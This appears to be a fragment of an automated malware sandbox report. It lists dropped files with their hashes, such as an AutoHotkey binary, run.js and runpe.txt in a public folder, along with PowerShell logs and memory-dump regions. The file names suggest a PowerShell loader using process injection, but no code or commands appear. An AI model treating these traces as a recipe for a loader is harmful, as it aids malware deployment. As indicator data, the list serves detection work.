| MD5 | 93f5c544ac2529f4049534fa5d045a84 |
| SHA1 | c3531d381ed5ee24d1ad72a30349df5b3d145dff |
| SHA256 | e31dda67e8c311f420cdaf6032298638c89136aad6495a37911c65ec04841557 |
| SHA512 | 255cdec1780546ab4c2235386604120a3759a692ca102051e1610b3a54d539073edae2a76c210475e4549688767a9708f5851b330afc223cbf048f15b939f06c |
C:\Users\Public\AutoHotkey.exe
| MD5 | e63e2669a293c1a6709c373f208a48cf |
| SHA1 | 489957991f7c59ec748fb4951fa0b2dd676c8998 |
| SHA256 | b740b8ea604a8b6ee1864353cfbbcd6778187486cc408d750c7a1a93bc6a0a0c |
| SHA512 | 82655f6110ffd9fcca1572b593ad0bef51974da5a18bdecc79ee88f8d56e14157b5349fadac4f27a8df4e6537165415acb6670fa0c453c5131d67d2500b5dde9 |
C:\Users\Public\AutoHotkey
| MD5 | 2312ab36e3363bfa8f217c14354aba68 |
| SHA1 | 736c5cb239a94007863c03c68705b890fd051302 |
| SHA256 | c53105c99521502a13e4dd32fa591a52b4b35026c68de86aa34f68532ff94769 |
| SHA512 | dcd58e38538b9aee53fa4d9b51e563e4e42bf9c7763d2094261b3de11dd21617bcb4bb8c39f86da9409c84b2b0e52a17a56a4aa1c832a0df47201576fd91860b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 07a5fbb68125d987909d513d084f9535 |
| SHA1 | 93e28a876ba5026afb1ccc8abcd3c5a02dcf0a11 |
| SHA256 | 51c74bd675736588b9916ce8df2212f6a68729f996ca2fa0a3fb3ed8950b4c96 |
| SHA512 | c12abaee0cfbffe8cabd697e889e0a90be08e44801904fa0330f2ed13e5ac1970c11ae9e623b0454e74f34195f41489f813378a6720a1a37a678ee01bd4aa9c2 |
memory/1364-876-0x0000000001150000-0x0000000001186000-memory.dmp
memory/1364-877-0x0000000006E30000-0x0000000007458000-memory.dmp
memory/1364-878-0x0000000006A30000-0x0000000006A52000-memory.dmp
memory/1364-881-0x0000000006BD0000-0x0000000006C36000-memory.dmp
memory/1364-882-0x0000000006C40000-0x0000000006CA6000-memory.dmp
memory/1364-883-0x0000000007560000-0x00000000078B0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 660c71d371faf04f0d58261805259eff |
| SHA1 | a5fd5af628d82691bb8583cfbd86ad47e5fb401e |
| SHA256 | 32d48a6ec7edc9b407dddd5b9b2448258b3b1e0a1ec5f913bef409bf8c21296b |
| SHA512 | 90ce439dfc965ca37bf7039c1dd73687ff510e235bc208a6aff14cf2daf6870013527397cc68a169b9a2adff1abbffd4c825092f2e23317ab6d145ea8ce79db9 |
memory/1364-885-0x0000000006DF0000-0x0000000006E0C000-memory.dmp
memory/1364-886-0x00000000078D0000-0x000000000791B000-memory.dmp
memory/1364-887-0x0000000007B40000-0x0000000007BB6000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | bc5216937975888ff7d4a7c3b0509a47 |
| SHA1 | eb2a3383836130396389727a6d1a7f2f690c0c49 |
| SHA256 | ece1ca4e5c739d38e71a0811b6d41008b6b28a3a4607a29714cb26ac4a9bc87a |
| SHA512 | 6940eaa4188a7b7c39f51a3db5f6bde19cebe00f30edf2f4d83927354f45a080f91425061cbf00a1f0d7d7cbe0a01d6bf2cc5137c49de09fc6a0b88ed46d90ec |
memory/1364-913-0x0000000008C80000-0x0000000008CB3000-memory.dmp
memory/1364-914-0x000000006FD30000-0x000000006FD7B000-memory.dmp
memory/1364-915-0x0000000008C40000-0x0000000008C5E000-memory.dmp
memory/1364-920-0x0000000008DB0000-0x0000000008E55000-memory.dmp
memory/1364-925-0x0000000008F50000-0x0000000008FE4000-memory.dmp
memory/1364-926-0x0000000008ED0000-0x0000000008EEA000-memory.dmp
memory/1364-927-0x0000000008F20000-0x0000000008F42000-memory.dmp
memory/1364-928-0x00000000094F0000-0x00000000099EE000-memory.dmp
memory/1364-969-0x0000000009050000-0x0000000009070000-memory.dmp
memory/1364-1002-0x0000000009100000-0x0000000009112000-memory.dmp
memory/4148-1174-0x000000006FD30000-0x000000006FD7B000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5eaff4ab49c18915d6341b82cc702e82 |
| SHA1 | e1a8ef47acf6ba6ae3c6e983b0dc728a1f2a5917 |
| SHA256 | 2ee1bd282f1305e092efb1f202712fd2363b8d303f2b8eae9e3e8fddec7503a9 |
| SHA512 | 5b5a537b9f3241e90d760752bcabfb275e953b44409eefbc843b8a0febc9606dba40156e11ba4b92a560e32fd9791110738ea29f5a96e91058b4cf8dd74bd551 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0d59d711268150bf08eb64ea74fa17d4 |
| SHA1 | c65423446193114716176dbfcb24c2cb330e9520 |
| SHA256 | 50848e5455bf128fb8508e3189399dd361c3135a65d8bad64e994573920b8542 |
| SHA512 | 345de5796311486aa1ef5119380f5a4c1f07cdb9a0f270298837dadb564a87079202a1a98bb8b9170568306c96c2c073b596e584d7fd751c2cae460c782fa190 |
C:\Users\Public\run.js
| MD5 | 660c9112523248048eaf7d9f1ee30960 |
| SHA1 | 3126188624a0299d3821ae3dd6411b4905ecfd0b |
| SHA256 | 81b60a632098a246910c001762b65d85e8c00ac88be7a38529e41bdd9ae51093 |
| SHA512 | effb1eb00acda9d51bb6de63604d96cb780a6e76e57fe48d67878089c894773ea41209060e7213e3f92d337e24e7f83a7ede6535bd84920d69af1a3e8d37e6e2 |
memory/4220-1270-0x0000000037B00000-0x0000000037B01000-memory.dmp
memory/4220-1269-0x0000000007800000-0x0000000007801000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | dd024c522f9a1b587dd363b85e06293d |
| SHA1 | 6b976d7de873d08d3c6be887deec98b978f563b6 |
| SHA256 | 316620c6de225029a3beb86ff3885b61d260d8fb23496d130a8d563fbd919bbf |
| SHA512 | 02c6b6cfe7ea89bf134e87d57239b8092a6ef3ac93fad89d676362ad9fa60758a11a01698c0d6862be2d4a11d27dc9c44a386c5705ab1286928ff4c7f6756eb7 |
C:\Users\Public\msg.txt
| MD5 | 149dc2d54015d59ede29c15507b17b15 |
| SHA1 | 876252f6bcdc985230657b40900deed96d499602 |
| SHA256 | bf192fdbd437dc8b262e9fc17343deed62fc26bf6ef103eaf5ca2a5587c66c8d |
| SHA512 | 320890f679bf4959a0b75c43f554eb997656ea6bbbc93782c22e028ea500dd889974de4964f8ee9fa033c0d7e4d54e322f0b9d53051df0bc2d06c77359f91464 |
C:\Users\Public\runpe.txt
| MD5 | afcc7cacf140469b858eaaca175fd3da |
| SHA1 | 5a0e7a65c86dbe0263f895397df93d4fd54d2ae8 |
| SHA256 | d09d8cbd5d77f224f31ff616d8c41e0202269092225e646464df3b42ff39a7ad |
| SHA512 | 7385fca6a5223bc9f0658fed6673a4547b1340c1b2160d6417e28a9f1da1998b2ce836620877f16a78a54db26f9538936dffc19c9c023db37a4912ade5b2bf18 |
memory/5000-1340-0x000000000AEC0000-0x000000000B538000-memory.dmp
C:\Users\Public\getMethod.txt
| MD5 | db37f91f128a82062af0f39f649ea122 |
| SHA1 | f21110ae7ac7cde74e7aa59b22ed10bace35b06b |
| SHA256 | e53ba77fa1dbcb1cc3beed1344f6ae7b182d6a2e2a09bb32ec0d4474978e4a32 |
| SHA512 | 681c5c69acba8c2b327afd0bcb1062fb5f6ee3231e6b95f4cd97ecd768879250eb81d36b1e1640554a85002a7b2b099acfe7f59f70884f10afd51d372583d3ae |
C:\Users\Public\Gettype.txt
| MD5 | 9221b7b54ed96de7281d31f8ae35be6a |
| SHA1 | 223fad426aa8c753546501b0643ee1720b57bff0 |
| SHA256 | 8eab5c7c6d1116d28014f0da7b7e78b9857da1e6f951b903f2a714fc6d3c790a |
| SHA512 | be37de186628a2c30698a6d4826ec5f8845e7b69317b2f044e86fae615c263a5fd179fcbc50821c85b49c9e3e71adb10a947060312da281418c8ca231d656d5d |
C:\Users\Public\load.txt
| MD5 | ec4d1eb36b22d19728e9d1d23ca84d1c |
| SHA1 | 5dbc716c4600097b85b9e51d6aeb77a4363b03ed |
| SHA256 | 0cf67fc72b3c86c7a454f6d86b43ed245a8e491d0e5288d4da8c7ff43a7bcdb0 |
| SHA512 | d67f0ffb682d7a13510ec5d3e643889d43bc7593429f806fd882b2c72c05a530c2462d332d4293015f33397cdec84c53d1eea58a7bebaab5504153729df02700 |
C:\Users\Public\Invoke.txt
| MD5 | 5fb833d20ef9f93596f4117a81523536 |
| SHA1 | d6aa1f3a789f3f3108666e0ac807ca5ca7dc5fa5 |
| SHA256 | e77f5b9f691679ef6fa67d3ec953199b1696cf6a0e77741c035f11aadfd9bf73 |
| SHA512 | afaec35da2440502779227d9436570db82e1f5d86c90662eae82564d717407518d4e1181e024566e2d8d6029bd4e738b9ba4a3108753a8d0d0c98934db94ba35 |
C:\Users\Public\Execute.txt
| MD5 | 40cd014b7b6251e3a22e6a45a73a64e1 |
| SHA1 | 6ea36ce8d4940505e9a2c8fea5db868cd8b3d440 |
| SHA256 | e3a67d9540e9a204f7dc4aa9d44a0ec652856cfa932a21196bf9df23aa0e4cd1 |
| SHA512 | 776d4496cc76782961d66f235ff257567e12e85b950101247fb29de911a4e44048398932f2881b5610cbad6c90fe1c4e99f346cc7d315d7b9a612c89b19b42ea |
C:\Users\Public\NewPE2.txt
| MD5 | 8a56a0e23dbfe7a50c5ec927b73ec5f2 |
| SHA1 | abebd513e68e63e7ec6ae56327c232b6e444ce0a |
| SHA256 | 3b348b38ac24e5e26423cc6d46936e7a4fdedda9d4aa89fdb2cfde4fad662cc1 |
| SHA512 | 276fc17efa7fef658167a94f22c76ae2abb6768d40702a39f970f196099058139249b8e12f18569f7f42f03f581f2543e49f39ab41553dd38d85511558a77ed2 |
memory/5000-1347-0x0000000008F10000-0x0000000008F62000-memory.dmp
memory/5000-1349-0x0000000009160000-0x00000000091FC000-memory.dmp
memory/2636-1351-0x0000000000400000-0x0000000000416000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 26d88b440d9d0e8033a3c13697357122 |
| SHA1 | 96e0a7a97273ae71ce5fa943dbd31d0fd2a9d3da |
| SHA256 | e6c80dd7fa8c961356f3206a61d7fa28098e8ec39282c4fff3dc9a70764b20bf |
| SHA512 | 51ec67f000dfe45b079218331945220e0a40e757960232466b1733a11117d85b28a5c9c8fb3ba5967d3e6c15ed3398fdeb6dbbbe4887bf102cda0a9b7ba9847b |
memory/748-1361-0x0000000037500000-0x0000000037501000-memory.dmp
memory/2844-1365-0x00000000080C0000-0x0000000008410000-memory.dmp
memory/2844-1367-0x00000000089D0000-0x0000000008A1B000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1f4eb69a29be3935e3b12f7780ee1e11 |
| SHA1 | b0e0dc61c62622cc3430a9013bda3781dfbac93f |
| SHA256 | 7fdfbd42dce3963e84221035af7371e32a9752281878051fc1a005dad0af3ec2 |
| SHA512 | 774daba0bb7d482c463f09a19fdf7c4bcd43262a046833110f1b4c45466765a86703dc32f6aaea5ae93df3e4a5ba36a63f0ae7627e2af35efd79a537af3e9876 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a64bda64ce721b9fe27626a7a53f1234 |
| SHA1 | d754ec7d2b2a97732dbac148ad1847729e104066 |
| SHA256 | f1586f142033f82464f3bcfc722da2c2c6d81cce1ddf33fdf58e9304775aee3e |
| SHA512 | d893566cecb50081c5a474304c8a14a01659e81b571b97172bab6eef8d499f615a0dc398882ee79267388d638370c51656bd2634332f40cf66c5d1f5271adc0b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ee95808f0d2e23aa39f3f4b7f0945f87 |
| SHA1 | 6c945f9f9d7cea7ba6574a421d34d892da26d854 |
| SHA256 | bced12db99aa901e86cdd13a33f1f92f0cf05faef9e6c450bb60d50a31579725 |
| SHA512 | 5bdbae84def4d16fefd6349c7aa6dfb7bf8bde85ddf1c3f9344c8f47eb89e7f6c6f58eef0cfd62bd294d668567ef50e1ded0c2f634e0e852311649790e2e9258 |
memory/5004-1599-0x0000000007E40000-0x0000000008190000-memory.dmp
memory/5004-1606-0x0000000008230000-0x000000000827B000-memory.dmp
memory/5004-1625-0x000000006F810000-0x000000006F85B000-memory.dmp
memory/5004-1630-0x0000000009640000-0x00000000096E5000-memory.dmp
memory/5004-1675-0x00000000098E0000-0x0000000009900000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 35396e0976df62853bf2d30ff6eda631 |
| SHA1 | 6fb9d1ebd61016182ff77731586b0233ad882632 |
| SHA256 | 91ca09a52f17bc102ca366f046061e703546af0f6f9387410292ffd71d3ee493 |
| SHA512 | 5d7824c8d6e8aeadd2a899a70b01a5be85673a056ae6f78d6d30dda6abaa7f5eca786b7d278243a4e9b6f75151cc4c646e5ba70a9a4119c8b99c09b984f28d94 |
memory/1376-1711-0x0000000015A00000-0x0000000015A01000-memory.dmp
memory/4688-1715-0x0000000007E10000-0x0000000008160000-memory.dmp
memory/4688-1717-0x0000000008360000-0x00000000083AB000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aspnet_compiler.exe.log
| MD5 | 605f809fab8c19729d39d075f7ffdb53 |
| SHA1 | c546f877c9bd53563174a90312a8337fdfc5fdd9 |
| SHA256 | 6904d540649e76c55f99530b81be17e099184bb4cad415aa9b9b39cc3677f556 |
| SHA512 | 82cc12c3186ae23884b8d5c104638c8206272c4389ade56b926dfc1d437b03888159b3c790b188b54d277a262e731927e703e680ea642e1417faee27443fd5b3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e3db37ef63e91cb245a0f68f0d8394c2 |
| SHA1 | bb22b650615bcb7bdbaecd19bcfc54528abf7c49 |
| SHA256 | ec2c48fdb0a933d5ad7565e0457b8213c8330c9dd73b56968822f69e695df468 |
| SHA512 | 94d461a42d6c08c7b05f2bb5ee0e62082cdb6a1930ed1afdbc4d88df12c8597ed8f4c96aceeb83bb5da848d63466c2650bbae568d6ae2dfd71f829c5b85c43a4 |
memory/424-1825-0x000001EBEEB10000-0x000001EBEEB32000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b81e9d05947fea89e7ddcce801c1a064 |
| SHA1 | b79ad46e40e705999d294362baca93728982caf2 |
| SHA256 | 1d529dd75d78765d9890654ea2f1708c8ddec634a7de80f3721a0d3e7169f381 |
| SHA512 | fa1ca56a7315b869fff824fde98c39937a057e69f646eea5c824ab1dd17da32362e9ef9bf29259f021b3f5cbdcdd58aab0c60abac32ed87e9851e29426b8c08b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 61950731b6bd9511614ad795ecfb33e1 |
| SHA1 | 1c2230e00a8173f6c0353400fd743a79201721d1 |
| SHA256 | 708adc90c38c7c693e780a5752b9f8de580938a135c1e6e41b7b2a6a82b730e0 |
| SHA512 | bbdc0727d584401e8387f530c6946501bca4756d6d24a925e113ceba20b49871db4146dedfff1e1a8b04c6f01c4fd68561694f98a41a45c85eea0aad59bffae5 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 75ad7a5dc2124781720d48c8d7484c28 |
| SHA1 | 523bb4cac760528505a0f2641fae260e8e8eb6e3 |
| SHA256 | 0f679acc4d440f4ac3daec2d533b41743af9700fd7b81fe6aa7ce945e901eb50 |
| SHA512 | 10c5dc0b354fcef6d7697fdc75c2729c6c9bb8a449ae72933c00b83cac045dc5725099a48b3d9a5417a5bd95e39a0900ca02ab5139f0a391f381b64c3060fed7 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | c381b744e3d9a5ec9d4d09b4d972c49a |
| SHA1 | 4dca627a6ac6004f65eb71d64904649e05d486a3 |
| SHA256 | ac4b99782d098afd476a88b65337d1c4267531b69a6c665c76d7c487e4b1f96a |
| SHA512 | 5c9bede70d5ec03cabf4459eb9119e4fdd71573cd0183cfbab28debf0dbadb8cdcf7e04ed85b6f837ebc384a808e9527e15cd0caba048ff3f8ea5206fba0ab94 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 7c0fd0a2dc598e3b8a06c56fbde7bbe9 |
| SHA1 | f4f39d2e24d5379b63b75c7d30afc12f770ea083 |
| SHA256 | 25aca030e176f1ab460fc9040567ceab9181575734d45949cc57b82bb2a8ac3b |
| SHA512 | a01e2f16f6ced0ad6f2e1c8bf3d9bc6200bfcbbcd67f1c1978ba838ad6a78ca83d7bce765181e84fa9b370da27fde10ff08a90f8c4cb70051bf8152037630523 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4592161628543166a5aff8a22a043bd1 |
| SHA1 | 3657888f08f280165401d5332d7a9e10a51a1eb0 |
| SHA256 | 0062e53922aa973897493e841356b3bb554cd9da97475bf71b5746267373a660 |
| SHA512 | de474dd4dd56eb5bede88ffed249c1c02594f0dc4dcbb00eafbebb0cba6fa0476576ce7867cd365f91038d1c86ca30422d905c7e353d20cb2bac373eb51fade8 |
memory/5020-2179-0x000000006F810000-0x000000006F85B000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2aa407b625b0ee4836081451c0699304 |
| SHA1 | fa714bf168447d03037b977675d84a2e40b4fde9 |
| SHA256 | 33d12777c7b6ebf7f1273a9d9d5b67dc9bf03c3e7aa82817afe0dd0781a501ae |
| SHA512 | a747837080a87b9df9361daed0dd2aaad7b4ccbea860eeec50b51ea971f84469dbfc5c73be7eaf4dd47bdbc5627f4fecf0229241b3b2d4cc4e1414ec6473df61 |
memory/4144-2267-0x000000000E600000-0x000000000E601000-memory.dmp